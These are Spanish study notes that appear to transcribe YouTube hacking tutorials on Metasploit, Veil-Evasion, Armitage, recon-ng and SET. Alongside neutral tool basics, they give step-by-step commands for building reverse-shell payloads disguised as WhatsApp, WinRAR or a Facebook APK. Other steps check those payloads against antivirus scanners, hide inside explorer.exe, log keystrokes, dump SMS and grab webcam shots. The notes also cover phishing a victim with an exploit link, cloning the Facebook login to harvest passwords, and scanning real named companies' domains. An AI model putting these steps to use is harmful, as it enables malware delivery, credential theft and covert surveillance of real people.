Subido por César García Suárez

Conceptos básicos de metasploit

Anuncio
METASPLOIT
Data Security
VIDEO 1 Conceptos básicos de metasploit
https://www.youtube.com/watch?v=tPrjUv3tSok
Metasploit Framework
Conceptos Básicos
temas a tratar
Que es metasploit
para qué sirve metasploit
historia de metasploit
tener una máquina virtual en virtualbox de
kali linux
*** Que es metasploit
metasploit es un proyecto de código abierto orientado a la seguridad informática, el cual provee
de información relacionada con vulnerabilidades además de ayudar a realizar pruebas de
penetración.
*** Para qué sirve
Su subproducto más conocido es metasploit framework. Se trata de una herramienta para
desarrollar y ejecutar exploits en contra de un equipo remoto.
Windows, Mac, Android, linux
*** Un poco de historia
Metasploit fue creado en el año 2003 como una herramienta de red portátil utilizando el lenguaje
de programación perl.
el 21 de octubre del 2009 el proyecto de metasploit fue adquirido Rapid7 una empresa de
seguridad que ofrece soluciones unificadas en gestión de vulnerabilidades.
cómo Iniciar metasploit en kali linux
netstat -ntpl ó service postgresql status
service postgresql start
netstat -ntpl ó service postgresql status
msfdb init
msfconsole
Estando dentro de msfconsole
msf>banner
msf>exit
msfconsole -q
msf>help
msf>db_status
msf>hosts
msf>vulns
msf>db_connect
msf>db_disconnect
msf>db_status
msf>db_connect
msf>db_status
msf>exit
Data Security
VIDEO 2 Taller metasploit
https://www.youtube.com/watch?v=fI-jz99Hso4
Arquitectura metasploit
Temas a tratar
En que está desarrollado metasploit
Arquitectura de metasploit
directorios
¿En qué está hecho?
Metasploit es un proyecto de código abierto orientado a la seguridad informática.
Este cliente con un subproyecto llamado "Metasploit framework" tiene otros subproyectos
importantes como por ejemplo las bases de datos de opcode (códigos de operación) metasploit
originalmente se desarrolló en perl aunque actualmente metasploit framework está escrito
completamente en ruby.
¿Cómo es por dentro?
Metasploit cuenta con una arquitectura que es sencilla de entender si se analiza de forma gráfica,
metasploit cuenta con los siguientes módulos:
- Librerías
- Interfaces
- Herramientas
- Plugins
- Módulos
Visto de forma gráfica, metasploit tiene el siguiente aspecto
El gráfico anterior nos permite entender cómo está diseñado metasploit por dentro.
Ahora bien, dentro de la carpeta de metasploit encontraremos sistemas de archivos, estos están
divididos en diversos directorios.
Veamos algunos de los directorios:
Data: Contiene y muestra los archivos editables utilizados por metasploit.
.Documentation: Provee documentación para el framework.
.Lib: Aquí es posible encontrar el código base del framework.
modules: Aquí se ubican los módulos disponibles contenidos en la versión de metasploit que
adquirimos.
Los directorios antes mencionados son solo algunos de los que tiene metasploit. Veamos de forma
práctica en una consola de comando como poder explorar dicho contenido.
Para poder explorar dicho contenido debemos acceder a la siguiente ruta
usr/share/metasploit-framework
cd /
cd usr
ls -l
cd share
ls -l
cd metasploit-framework
clear
ls -l
cd db
ls -l
cd ..
ls
cd documentation
ls
cd ..
exit
Data Security
VIDEO 3 Módulos de metasploit
https://www.youtube.com/watch?v=lHv2JESmn3c
Temas a tratar
-
Qué son los payloads
Qué son los Exploits
Qué son los encoders
Qué son los nops
Qué son los auxiliares
Un Payload, es un programa que acompaña a un exploit para realizar funciones específicas una
vez el sistema objetivo es comprometido, la elección de un buen payload es una decisión muy
importante a la hora de aprovechar y mantener el nivel de acceso obtenido en un sistema.
El payload es el medio de transporte del exploit para llevarlo a su objetivo.
El payload es el camión y la carga es el exploit.
¿Qué son los exploits?
Un exploit es un programa que explota una o varias vulnerabilidades en un software determinado,
frecuentemente es utilizado para ganar acceso a un sistema y tener un nivel de control sobre él.
¿Qué son los encoders?
Los encoders son una herramienta interesante dentro de metasploit framework.
Muchas veces al crear un payload debe ser codificado, esto con la intención de intentar evadir los
sistemas antivirus y otras medidas de seguridad.
¿Qué son los nops?
Los nops son módulos de no operation y su función es sumamente interesante, debido a que estos
mantienen los tamaños de las cargas útiles (payloads) de forma consistente.
¿Qué son los auxiliares?
Un auxiliar es un programa que permite obtener información sobre el objetivo con el fin de
determinar posibles vulnerabilidades.
Este tipo de programas son útiles para establecer una estrategia de ataque sobre un sistema
objetivo.
Vamos hacer ejercicios en la terminal
service postgresql start
msfconsole -q
msf>search auxiliary
msf>clear
msf>search payloads
para utilizar un payload
msf>use exploit/Firefox/local/exec_shellcode
ya estando dentro de él puedo digitar
msf exploit/Firefox/local/exec_shellcode>info
msf exploit/Firefox/local/exec_shellcode>back
msf>clear
msf>search exploits
msf>use exploit/windows/misc/citrix_streamprocess_data_msg
msf exploit/windows/misc/citrix_streamprocess_data_msg>options ó show options
msf exploit/windows/misc/citrix_streamprocess_data_msg>info
msf exploit/windows/misc/citrix_streamprocess_data_msg>clear
msf exploit/windows/misc/citrix_streamprocess_data_msg>back
msf>search nops
msf>use exploit/windows/http/mdaemon_worldclient_form2raw
msf exploit/windows/http/mdaemon_worldclient_form2raw>options
msf exploit/windows/http/mdaemon_worldclient_form2raw>info
msf exploit/windows/http/mdaemon_worldclient_form2raw>clear
msf exploit/windows/http/mdaemon_worldclient_form2raw>back
msf>clear
msf>search encoder
msf>use exploit/windows/http/novell_messenger_acceptlang
msf exploit/windows/http/novell_messenger_acceptlang>info
msf exploit/windows/http/novell_messenger_acceptlang>options
msf exploit/windows/http/novell_messenger_acceptlang>back
msf>clear
msf>search Apple
msf>search osx
Data Security
VIDEO 4 Filtrado de exploit
https://www.youtube.com/watch?v=vlZF_QJX120
temas a tratar
la consola de IRb
Filtrado Exploits
Resultados en consola
¿Qué es Irb?
Irb o la consola de ruby es un intérprete interactivo que permite a un desarrollador
ingresar comandos y/o bloques de código que posteriormente serán ejecutados por Ruby.
filtrado de exploits
Como sabemos después de un escaneo con nmap encontramos puertos abiertos, servicios
corriendo, así como las versiones de estos.
Cada puerto abierto es una probable puerta de acceso al sistema objetivo.
Veamos un ejemplo:
Como se aprecia tenemos varios puertos abiertos, los cuales pueden sernos de utilidad
para lograr un acceso al sistema.
Veamos cómo filtrar la búsqueda de exploits para intentar atacar mediante el puerto 445
(por citar un ejemplo) .
el resultado del filtrado de exploits por número de puerto
vamos ahora hacer la práctica en la terminal:
service postgresql start
msfconsole -q
msf>
ahora con ctrl + shift + t abrimos otra pestaña
en esa pestaña nueva le damos un netdiscover
Escogemos una dirección ip para realizar el filtrado de exploits
192.168.0.11
Ahora le hacemos un escaneo sencillo
nmap 192.168.0.11
esto es para ver cuales son los puertos que están abiertos
framework.exploits.each_module { |n,e| x=e.new; print_good(“#{e.fullname};
#{x.datastore[‘RPORT’]}”) if x.datastore[‘RPORT’].to_i == 443 }; nil
ahora en:
msf>irb
>>
>>framework.exploits.each_module { |n,e| x=e.new; print_good(“#{e.fullname};
#{x.datastore[‘RPORT’]}”) if x.datastore[‘RPORT’].to_i == 139 }; nil
>>framework.exploits.each_module { |n,e| x=e.new; print_good(“#{e.fullname};
#{x.datastore[‘RPORT’]}”) if x.datastore[‘RPORT’].to_i == 443 }; nil
>>exit
msf exploit(windows/novell/netiq_pum_eval)>info
Data Security
VIDEO 5 opciones avanzadas para módulos de metasploit
https://www.youtube.com/watch?v=PA2xOWY0xHs
service postgresql start
msfconsole -q
msf>banner
msf>help
msf>show payloads
msf>clear
msf>show exploits
msf payload(linux/armle/shell_bind_tcp) >options
msf payload(linux/armle/shell_bind_tcp) >advanced
msf payload(linux/armle/shell_bind_tcp) >back
msf>use exploit/multi/handler
msf exploit(multi/handler)>options
msf exploit(multi/handler)>advanced
msf exploit(multi/handler)>back
msf>search android
msf> use exploit/multi/local/allwinner_backdoor
msf exploit(multi/local/allwinner_backdoor)>options
msf exploit(multi/local/allwinner_backdoor)>advanced
msf exploit(multi/local/allwinner_backdoor)>
Data Security
VIDEO 6 Librerías en meterpreter
https://www.youtube.com/watch?v=LO9NJSycWqQ
meterpreter>sysinfo
meterpreter>help
meterpreter>use -l
meterpreter>use mimikats
meterpreter>?
meterpreter>use -l
meterpreter>use kiwi
meterpreter>?
meterpreter>
_______________________________________________________________
Data Security
LAS 5 ETAPAS DEL HACKING ÉTICO
https://www.youtube.com/watch?v=1hra-VxvIFs
1.
2.
3.
4.
5.
Reconocimiento
Scanning
Acceso al sistema
Persistencia
Borrar rastros
1. Reconocimiento
en esta primera etapa un atacante se vale de diversas técnicas para recolectar toda
la información que le sea posible sobre su objetivo.
Entre la información que puede ser recolectada a través de internet se puede
mencionar:
-
Datos relacionados con los clientes de la empresa.
Datos relacionados con los empleados de la empresa.
Información sobre la red de la empresa.
Sistemas que utiliza la empresa.
Existen dos tipos de reconocimiento que pueden ser utilizados por un hacker:
-
Reconocimiento pasivo
Permite recolectar información sin la necesidad de interactuar
directamente con la víctima.
pOf -i eth0 -p
ettercap
Maltego
-
Reconocimiento activo
Permite recolectar información directamente con la víctima.
nmap, armitage
2. Escaneo de puertos y servicios
Una vez concluida la fase de reconocimiento la siguiente etapa es el escaneo de
puertos y servicios, también conocida como scanning.
En esta etapa se realiza un escaneo de la red objetivo para poder ejecutar el
ataque.
nmap
Durante el proceso de escaneo se busca obtener la siguiente información:
-
Sistemas operativos que utilizan los servidores y las terminales.
Los puertos abiertos en los servidores.
Se hace un escaneo de vulnerabilidades.
Se realiza un mapeo de redes.
3. Obtención de acceso al sistema
Una vez que se conocen las vulnerabilidades entonces se procede con la siguiente
etapa en la cual el atacante busca obtener el acceso al sistema, esto se logra
derivado de las vulnerabilidades encontradas.
Para lograr el acceso a un sistema se pueden emplear diversas técnicas:
-
Secuestro de credenciales.
Ataques a navegadores web.
Bindeo de puertas traseras (backdoors).
Ataques de hombre en medio (man in the middle).
Una vez tenga acceso al sistema hay que realizar Elevación de privilegios.
3.1. Elevación de privilegios
Cuando se compromete un sistema generalmente se obtienen privilegios
estándar (privilegios de usuarios).
El atacante debe ejecutar acciones que le permitan elevar estos privilegios
para convertirse en usuario administrador.
4. Persistencia en el sistema
Una vez que el sistema tiene privilegios de administrador tiene control total sobre
el sistema y puede realizar cualquier cantidad de acciones.
La principal de estas acciones es mantener el acceso a dicho sistema.
En esta etapa el atacante asegura el poder entrar y salir del sistema comprometido
tantas veces como lo desee sin la necesidad de realizar procedimientos complejos.
Esto se logra instalando:
-
Caballos de Troya (troyanos).
Puertas traseras (backdoors)
Rootkits
Una vez que el atacante ya ha garantizado su acceso al sistema y ya con el
control total de este, se pueden realizar acciones tales como:
-
Subir o bajar archivos del sistema comprometido
Alterar el funcionamiento del sistema
Desinstalar software de forma remota y silenciosa
Grabar la actividad del usuario (cámara y micrófono)
Otra de las acciones importantes que puede realizar el atacante es utilizar el
sistema comprometido como punto de partida para acceder a otros sistemas que
pertenecen a la organización objetivo, a este procedimiento se le conoce como
pivoting.
5. Limpiar rastros
Una vez el atacante ha realizado todos los cambios y modificaciones en el sistema
lo que se realiza es el procedimiento de borrado de huellas también conocido
como eliminación de rastros o evidencia.
En el caso de hacking ético se siguen procedimientos que son muy similares, pero
la diferencia entre un hacker no ético y un hacker ético es:
El hacker ético no ejecuta las 5 etapas de hacking, los hackers éticos terminan su
trabajo haciendo reportes donde hacen recomendaciones para proteger los
sistemas y evitar ser víctimas de un atacante.
_______________________________________________________________
Data Security
VIDEO Penetrando windows 7 con metasploit
https://www.youtube.com/watch?v=xXVolDpdTfQ
Necesitamos utilizar una herramienta que se llama veil
ifconfig
la ip de kali linux 192.168.0.7
ls -la
cd Veil-Evasion
ls
./Veil-Evasion.py
se encuentran varios payloads
list
use 19
generate
1 --- msfvenon
enter
LHOST--- 192.168.0.7
LPORT--- 4444
enter
colocar el nombre del payload: Activador win7
exit
exit
exit
iniciamos metasploit
service postgresql start
msfconsole -q
msf>use exploit/multi/handler
msf exploit(multi/handler)>options
msf exploit(multi/handler)>set LHOST 192.168.0.7
msf exploit(multi/handler)>set LPORT 4444
msf exploit(multi/handler)>exploit
esperamos hasta que la víctima le haga doble clic a lo que le mandamos
en la máquina de windows 7 se ejecuta el archivo Activador win7.back
y el windows 7 se conectara a la máquina de kali linux
meterpreter>sysinfo
meterpreter>pwd
meterpreter>ps
----ps es para ver los procesos
estamos mirando los procesos para ocultarnos en algún proceso que nunca se cierre esa
es una forma de ocultarse.
buscamos por ejemplo el proceso del explorer.exe su código 3336
meterpreter>migrate 3336
migrating from 992 to 3336
lo que hace este comando es que se está escondiendo el power shell hecho en veil detrás
del explorer.exe
en algunos casos la migración falla, entonces habría que probar con otro proceso para
ocultarnos
meterpreter>pwd
meterpreter>ls
meterpreter>cd ..
meterpreter>ls
meterpreter>pwd
c:/
meterpreter>ls
meterpreter>cd Windows
meterpreter>ls
meterpreter>execute
meterpreter>execute -f notepad.exe
meterpreter>
_______________________________________________________________
Data Security
VIDEO Configurar Veil framework
https://www.youtube.com/watch?v=EiRwvW6Z6VM
apt-get install veil
veil-evasion
next
next
yes
next
finish
siguiente
pywin32-218
siguiente
siguiente
terminar
siguiente
siguiente
siguiente
please enter a command
_______________________________________________________________
Hacking Ético León
VIDEO Instalar Veil Evasion Framework 3.0 en kali linux
https://www.youtube.com/watch?v=HLK3T9CGee4
https://github.com/Veil-Framework/Veil
https://www.veil-framework.com/
apt-get install veil-evasion
otra forma de instalar.
Debe estar instalado git sino está
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
ls
./config/setup.sh --force --silent
instalar python desde wine
Siguiente
Siguiente
Siguiente
Finish
Pywin32-220
Siguiente
Siguiente
Siguiente
Finish
Pycrypto-2.6.1
Siguiente
Siguiente
Siguiente
Finish
Ruby
Ok
Aceptar licencia
Siguiente
Siguiente
Siguiente
Finish
Ya despues que instale todo
cd Veil
ls
./Veil.py
list
use 1
list
use 28
_________________________________________________________________________
Hacking Ético León
VIDEO crear payload con Veil Evasion y migrar proceso
https://www.youtube.com/watch?v=mPc7wDGuvhk
cd Veil
ls
./Veil.py
list
use 1
list
use 28
Abrimos otra terminal y digitamos ifconfig para ver nuestra ip
192.168.1.20
set LHOST 192.168.1.20
set LPORT 1030
set USE_PYHERION Y
options
options
generate
colocar un nombre
Python_Installer
escogemos la opción 1 Pinstaller
Sale una información en donde se creó el archivo
Voy a copiar el archivo
cp /usr/share/veil-output/completed/Python_Installer.exe /root/Escritorio/
Ahora utilizamos el msfconsole
msfconsole -r /usr/share/veil-output/handlers/Python_Installer.rc
msf Exploit(handler)>
Ahora pasamos el archivo que está en el escritorio a la víctima
Listo lo pasamos a Windows
Ahora en windows miramos en el navegador
nodistribute.com
Para ver cuantos antivirus lo detectan
Le debo de cambiar el nombre al archivo y colocarle Python
Cuando le dé doble clic allí se empieza a ejecutar silenciosamente
y al mismo tiempo en kali linux se está iniciando una sesión
sessions -i 1
meterpreter>
meterpreter>sysinfo
Bueno aquí es necesario ocultarse
meterpreter>run post/windows/manage/migrate
Lo que hace esto es que se esconde en otro proceso y así no nos borren
meterpreter>ps
meterpreter>
Si borran el archivo ya no hay problemas porque ahora ya estamos en otro proceso
meterpreter>mkdir vulnerable
_________________________________________________________________________
Hacking Ético León
VIDEO crear payload con Veil Evasion
https://www.youtube.com/watch?v=QpWDYNpHq4M
Como podemos camuflar un payload
cd Veil
ls
./Veil.py
list
use 1
list
use 21 --- powershell/meterpreter/rev_https.py
Abrimos otra terminal para ver cual es nuestra ip… ipconfig 192.168.1.20
set LHOST 192.168.1.20
options
generate
colocar el nombre a la aplicación: Whatsapp
vamos a copiar la ruta para pasarlo al escritorio
cp /usr/share/veil-output/source/Whatsapp.bat/ /root/Escritorio/
ahora lo que hacemos es abrir metasploit framework con el archivo .rc
msfconsole -r /usr/share/veil-output/handlers/Whatsapp.rc
los archivos rc nos ayudan a automatizar
ya se encuentra a la escucha nuestro metasploit framework
Así que vamos a ingresar en una usb el archivo para pasarlo a windows.
una vez pasado a windows
ahora vemos en el navegador en
nodistribute.com
cuantos antivirus lo detectan
bueno lo detectan varios antivirus cuando es .bat
cuando le damos doble clic se genera la conexión con el kali linux una sesión
Bueno vamos a utilizar un programa para convertir de .bat a .exe
se llama bat_to_exe_converter
para utilizar el programa buscamos el archivo .bat
hay que buscar la imagen de whatsapp
la buscamos en google y la descargamos
esta imagen hay que convertirla en icono y alli utilizamos toyicon
y lo convierte a .ico
bueno volvamos a bat.exe
en donde dice version information
buscamos el icono. el que creamos y lo colocamos
va a tener una arquitectura de 32 bits
y le damos compilar
y ya se genero el ejecutable pasó de .bat a .exe con su icono
Ahora vamos a subir nuevamente el archivo a
nodistribute.com
para si lo detectan
y ahora solamente lo detectan 5 de 35 antivirus entonces es muy bueno
si se le da doble clic al archivo, se genera una nueva sesión en kali linux
sessions -i 2
meterpreter>sysinfo --- información de la máquina objetivo
meterpreter>getuid --- que usuario estamos conectado
meterpreter>screenshot ----tomamos una foto
meterpreter>help --- para ver todos los comandos
meterpreter>getsystem --- subir de privilegios ser system pero se necesitan otros
comandos para ser administradores
por último migramos a otro proceso porque es sospechoso que el archivo que se está
utilizando en windows no se puede eliminar
run /post/windows/manage/migrate
ya después que migró ya se puede eliminar el archivo en windows del whatsapp, pero no
se pierde la sesión porque ya se encuentra en otro proceso
_________________________________________________________________________
Hacking Ético León
VIDEO Activar Keylogger con Metasploit | Kali Linux
https://www.youtube.com/watch?v=jvE7W2r2uY0
En la parte anterior hicimos un backdoor con veil 95% indetectable .
ya hay una sesión de metasploit
meterpreter>run post/windows/capture/keylog_recorder
_________________________________________________________________________
_________________________________________________________________________
https://www.redeszone.net/2015/07/29/plaguescanner-una-aplicacion-similar-avirustotal-pero-totalmente-opensource/
https://github.com/PlagueScanner/PlagueScanner
Explorador de plagas
PlagueScanner es un marco de escáner AV múltiple para organizar un grupo de
escáneres AV individuales en un escáner contiguo. Hay dos componentes básicos
en esta versión inicial: Core y Agentes.
Todos los componentes de PlagueScanner tienen las siguientes dependencias:
1. Python3: https://www.python.org/
2. ZeroMQ: http://zeromq.org/
3. pyzmq: https://github.com/zeromq/pyzmq
Los Agentes tienen la siguiente dependencia adicional:
1. Solicitudes: http://docs.python-requests.org/en/latest/
Y el Core tiene la siguiente dependencia.
1. Servidor web (se recomienda NGINX): http://nginx.org/
En el mismo directorio que cada archivo .py, debe haber un archivo de
configuración con el siguiente formato.
[PlagueScanner]
IP =
Port = 5556
OutboundSamplesDir = /usr/local/www/plaguescanner
[ClamAV]
IP =
[ESET]
IP =
[Bitdefender]
IP =
Los escáneres utilizados fueron los siguientes:
1. ClamAV: http://www.clamav.net/index.html
2. ESET: http://www.eset.com/us/business/server-antivirus/file-security-linux/
3. Bitdefender: http://www.bitdefender.com/business/antivirus-for-unices.html
Nota : Al agente de Trend Micro le falta la expresión regular. Esto se solucionará
en breve.
El directorio que sirve NGINX debe tener los permisos de grupo configurados + wy
el usuario que ejecuta plaguescanner.py como agregado a ese mismo grupo.
Esto se ha probado con cada escáner instalado en máquinas virtuales separadas
con el Core también separado. El Core y cada una de las otras máquinas virtuales
deben estar en el mismo segmento de red cerrado. Después de iniciar cada
agente, escanee un archivo así:
$ ./plaguescanner.py sample.exe
_________________________________________________________________________
Páginas web Online en busca de virus
https://www.virustotal.com/es/
https://virusscan.jotti.org/
http://nodistribute.com/
https://metadefender.opswat.com/#!/
http://www.virscan.org/
Si no queremos que nuestros archivos se compartan con las empresas antivirus
debemos evitar utilizar las plataformas anteriores y, a cambio, hacer uso de
otras similares como:
●
●
●
●
●
●
●
StopVir.us
Poison Scanner
NoDistribute
Majyx
VirusCheckMate
ZiScan
http://wwww.reverse.it/
Aunque no podemos tener la certeza de que no compartan los archivos, al
menos así lo aseguran.
https://securitytwins.com/index.php/2019/01/09/es-o-no-es-un-malware-este-es-el-grandilema/
_________________________________________________________________________
Error 404 Not Found
VIDEO Fase Reconocimiento Auditoría Web by Ferre
https://www.youtube.com/watch?v=GU9BP8sWXT4
whois cemex.com
se crea un archivo con todo lo que encontremos y lo vamos guardando allí
hay una pagina que se llama network tools
https://network-tools.com/
colocamos en la caja de texto: cemex.com y clic en go. La información originada aquí se
guarda en el archivo.
después en la terminal digitamos
nmap -sS -sv cemex.com
en otra terminal:
nslookup cemex.com
nslookup www.cemex.com
otro comando
theharvester -d cemex.com -l 500 -b all
Este se encarga de buscar emails en el dominio
otro comando
host cemex.com
host www.cemex.com
host -t ns cemex.com
host -t ns www.cemex.com
otro comando
dig cemex.com
dig www.cemex.com
verificar dns
ahora vamos a utilizar unos scripts interesantes de nmap
nmap --script dns-brute cemex.com
este nmap se brincó la protección de incapsula y puedo ahora conocer el servicio que se
encuentra en cada puerto
ahora otro script nmap
nmap --script http-waf-fingerprint cemex.com
con este script es para saber si tiene algún tipo de protección que no hallamos detectado
otro comando
nmap -sS -sv upload.cemex.com
nmap --script http-waf-fingerprint omhe.org
esta página está protegida
nmap --script http-slowloris-check www.saltilloindustrial.com
_________________________________________________________________________
CAPTURA DE INFORMACIÓN
1. recon-ng:
http://www.reydes.com/d/?q=Reconocimiento_Web_utilizando_Recon_ng
Data Security
VIDEO: Recopilando información recon-ng
https://www.youtube.com/watch?v=kJ6tz1HDM9E
recon-ng funciona parecido a maltego, pero esta es gráfica y recon-ng es por
comandos.
Abrimos la terminal de kali linux…
digitamos recon-ng
lo primero que hay que hacer es un área de trabajo
workspaces add datasecurity
Ahora tenemos que aderirle un dominio
add domains udemy.com
muestrame los dominios que acabo de ingresar
show domains
Ahora vamos a ver los módulos que tiene esta herramienta
show modules
vamos a utilizar un módulo
use recon/domains-hosts/hackertarget
Ahora vamos a configurar el módulo
show info
Vamos a extraer direcciones ip de subdominios
set SOURCE udemy.com
ahora lo ejecutamos
run
_________________________________________________________________________
_________________________________________________________________________
Hackersploit
VIDEO 1 Recon-ng - Commands,
Workspaces And Data Management
https://www.youtube.com/watch?v=0J6Auz88iTY
recon-ng
show
show domains
show dashboard
clear
workspaces add wls
clear
show
show workspaces
ruta de recon--- /usr/share/recon-ng
workspaces select default
clear
show
show modules
clear
add domains
bbc.com
show domains
add companies
BBC
New Company
show companies
-Buscar módulos
search whois
-utilizar un módulo
use whois_pocs
clear
show info
run
_________________________________________________________________________
Hackersploit
VIDEO 2 Recon-ng - Adding API Keys,
Database Commands and Advanced
Scanning
https://www.youtube.com/watch?v=ueWeucZMdmk
show keys
workspaces select wls
clear
show keys
aquí podemos ver la API
https://account.shodan.io
copiamos la API de shodan
kays add shodan_api Bsdaerdf456tfgyhvgfd
show keys
clear
search shodan
clear
show domains
add domains
bbc.com
show domains
delete
delete domains 1
show domains
add domains
bbc.com
clear
use interesting_files
show info
back
use google_site_web
show info
run
back
use interesting_files
run
le da clic derecho al archivo robots.txt y se abre y muestra información de la página web
_________________________________________________________________________
_________________________________________________________________________
Hackersploit
VIDEO 3 Recon-ng - Complete Scan Emails, Sub Domains & Hidden Files
https://www.youtube.com/watch?v=68rRliy5DBw
recon-ng
add domains
microsoft.com
show domains
use whois_pocs
show info
run
show contacts
back
use bing_domain_web
show info
show domains
run
clear
show hosts
back
clear
use brute_hosts
show info
run
clear
show hosts
back
clear
use interesting_files
show info
run
back
clear
show contacts
clear
show hosts
para investigar mas colocamos recon-ng en youtube.com
_________________________________________________________________________
Hackersploit
VIDEO 4 Recon-ng - Introduction And
Installation
https://www.youtube.com/watch?v=x80wy7XQCoU
recon-ng
_________________________________________________________________________
Hackersploit
VIDEO 5 Recon-ng - IP Geo-location
https://www.youtube.com/watch?v=9NJmKm-ipAA
show hosts
show domains
clear
add hosts
bbc.com
use hosts-hosts/resolve
show hosts
run
show hosts
clear
use freegeoip
show info
show hosts
run 1-4 --- este comando es así porque hay 4 hosts
los resultados que salgan se colocan en google maps
_________________________________________________________________________
Hackersploit
VIDEO 6 Recon-ng - Scanning Services
With builtwith API
https://www.youtube.com/watch?v=Bx6D-VYz4no
recon-ng
clear
show keys
En esta página web podemos obtener una api
https://api.builtwith.com
kays add builtwith_api dlkvfdklñkkbmñkwkmbñkw
clear
show domains
show hosts
clear
use builtwith
show info
add domains
finercoder.com
clear
show domains
run
_________________________________________________________________________
Hackersploit
VIDEO 7 Recon-ng - Generating Reports
https://www.youtube.com/watch?v=d2Po2e_oyE4
recon-ng
clear
show domains
show hosts
clear
show dashboard
clear
search reporting
use reporting/csv
show info
run
back
use reporting/html
clear
show info
set CUSTOMER BBC
set CREATOR Zagaz
run
buscar el archivo en la ruta de recon-ng
_________________________________________________________________________
Oscar Perort
VIDEO Prueba de penetración y
exploración con Armitage Kali en android
https://www.youtube.com/watch?v=W3I7UQvEcEU
digitamos en la consola
service postgresql start
armitage
clic en connect
clic en si
abrir otra consola y digitar
ifconfig
192.168.1.8
vamos a crear un archivo apk en msfvenom
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.8 lport=4567 -R
>/root/Escritorio/facebook.apk
también lo podemos hacer con armitage
clic en payload
clic en meterpreter
clic en reverse_tcp
colocamos el lhost=192.168.1.8
y el lport= 4567
clic en Launch
después que la aplicación apk esté lista la podemos enviar por whastapp o por drive o
cualquier medio de envío electrónico
cuando la victima le da doble clic al apk se establece conexión con armitage
hacemos clic derecho
escoger meterpreter
clic en interact
clic en meterpreter shell
en el shell podemos digitar help y nos salen los comandos que se pueden utilizar
meterpreter>help
meterpreter>sysinfo
meterpreter>dump_sms
en otra terminal
cd /usr/share/armitage
ls
nano sms_dump_201812345.txt
_________________________________________________________________________
adrianchelo
VIDEO kali linux, ataque con armitage
(video con audio)
https://www.youtube.com/watch?v=5d2PT2ShBiI
https://www.youtube.com/watch?v=5d2PT2ShBiI&t=339s
Abrimos el metasploit
service postgresql start
msfconsole -q
y en otra terminal
armitage
dejamos por default lo que dice allí
clic en connect
clic en hosts
add host
192.168.1.9
clic en aceptar
clic derecho en el nuevo host
escogemos host
escogemos operating system
escogemos windows
clic en win 7
clic en el menú attacks
clic en find attacks
allí vas a buscar todas las vulnerabilidades de los equipos que están conectados
clic en aceptar
tenemos que buscar por internet tipos de vulnerabilidades
en la búsqueda digitamos ms11 este es un tipo de vulnerabilidad
la vulnerabilidad se llama:
ms11 -003 Microsoft Internet Explorer CSS Recursive Import Use After Free
clic en Launch
se nos genera un link:
Local IP: http://182.168.2.104:8080/ZbmUOD
Bueno hay que aplicar ingeniería social y le podemos enviar un correo a la persona que se
encuentra en nuestra misma red.
después que el la abra el link estaría infectado
nunca utilices tus correos personales.
crea un correo diferente con información ficticia
hay que escribir algo llamativo para que la persona lo abra
en la víctima se puede ver el ipconfig para ver si se encuentra en la misma red
ahora se abre el correo por internet explorer
clic en el enlace
una vez le de clic ya nos podemos conectar a ella se establece una conexión
apenas el abra el enlace, en el armitage el icono del pc se pone en rojo
clic derecho
meterpreter
explorer
scremshot
--Activar camara--- meterpreter --- explorer --- webcam shot
_________________________________________________________________________
Naturalsoul
VIDEO [Trabajo Universitario] Hackear
Windows 10 con Armitage en Kali Linux
2.0
https://www.youtube.com/watch?v=X4VTOPJ0nBg
https://www.youtube.com/watch?v=X4VTOPJ0nBg
service postgresql start
armitage
clic en connect
clic en yes
el programa armitage coloca el equipo lento gasta bastantes recursos de memoria ram
armitage detecta los pcs que están en nuestra red
sino detecta entonces
clic en el menu hosts
escoger nmap scan
quick scan
colocar el rango de red por ejemplo
192.168.0.0/24
la ip victima es la 192.168.0.52
nos vamos entonces al menu de la izquierda seleccionamos payload
clic en windows
meterpreter
reverse_tcp
doble clic
tenemos que ver cual es la ip de kali linux
ifconfig
192.168.0.50
LHOST = 192.168.0.50
LPORT = 6565
en donde dice output buscamos el que dice exe
clic en launch para generar el troyano o payload
buscamos una carpeta en donde podamos guardar el archivo payload
colocarle un nombre
winrar.exe
clic en save
se genera y quedó guardado en el escritorio
ahora volvemos a repetir los pasos en armitage
volvemos a seleccionar el mismo exploit
reverse_tcp
asegurarse de que sea la misma ip y puerto del que acabamos de crear
y en output lo dejamos en multi/handler
clic en Launch
ya con eso debería estar nuestro servidor en escucha
ahora lo que toca es pasar el archivo troyano a nuestra máquina de windows
hay que estar pendientes del antivirus…. si se puede desactivar seria mejor
hacemos doble clic al archivo
clic en ejecutar de todas formas
y se establece una sesión en meterpreter
y el icono del pc aparece en rojo
clic derecho
meterpreter --- access ---
_________________________________________________________________________
Hacking Ético León
VIDEO SETOOLKIT #1 | HEL
https://www.youtube.com/watch?v=MFjuTZeip4U
Ingeniería social: La manipulación inteligente de la tendencia natural de la gente a
confiar.
el ser humano es la parte principal de vulnerar
vamos a utilizar una herramienta de kali linux llamada
setoolkit
con esta herramienta vamos a crear un phishing o un clonado de una página web, en este
caso facebook.
esto va a levantar un servidor apache
y va haber una dirección ip y un puerto a la escucha
para entrar a la herramienta digitamos
setoolkit
digitamos el 1 ---social engineer
2 ---web site attack vector
3 ---credential harvester attack method
2 -- site cloner
nos pide la ip de kali linux
en otra terminal dígito ifconfig 192.168.1.8
ahora nos pide la url a clonar:
https://www.facebook.com/login.php
y le damos enter y comienza el clonado
ya queda a la escucha para el cometido
en otro equipo de la misma red
abrir un navegador
y digitar en la barra de direcciones
http://192.168.1.8:80
sale la pagina clonada de facebook
digitar el usuario…
digitar la contraseña…
y aparece esos datos en kali linux
_________________________________________________________________________
DragonJAR
VIDEO Curso GRATIS de Introducción a
Metasploit 2018
https://www.dragonjar.org
https://www.youtube.com/watch?v=I3fzrEW1vf4
msfupdate: Usado para actualizar Metasploit a su última versión.
msfconsole: Usado para ingresar a la consola de Metasploit.
msfvenom: Creación de puertas traseras (Backdoor)
msf>help: Sirve para obtener ayuda sobre el uso de metasploit
msf>search: Permite buscar dentro del framework lo que necesites
msf>use: se usa para seleccionar o cargar cualquier módulo
msf>info: permite mostrar la documentación del módulo.
msf>show: Permite mostrar opciones, objetivos, parámetros, etc
msf>set: Permite asignar valores a las diferentes opciones.
msf>check: Verifica que el exploit pueda funcionar sin ejecutarlo
msf>run o exploit: Ejecuta el módulo con los parámetros definidos
exit -y: puedo salir de metasploit
Aquí se encuentran todas las carpetas de metasploit
cd /usr/share/metasploit-framework
ls
cd modules
ls
msfconsole
msf>banner
msf>help
msf>db_status
msf>hosts
msf>workspace
msf>services
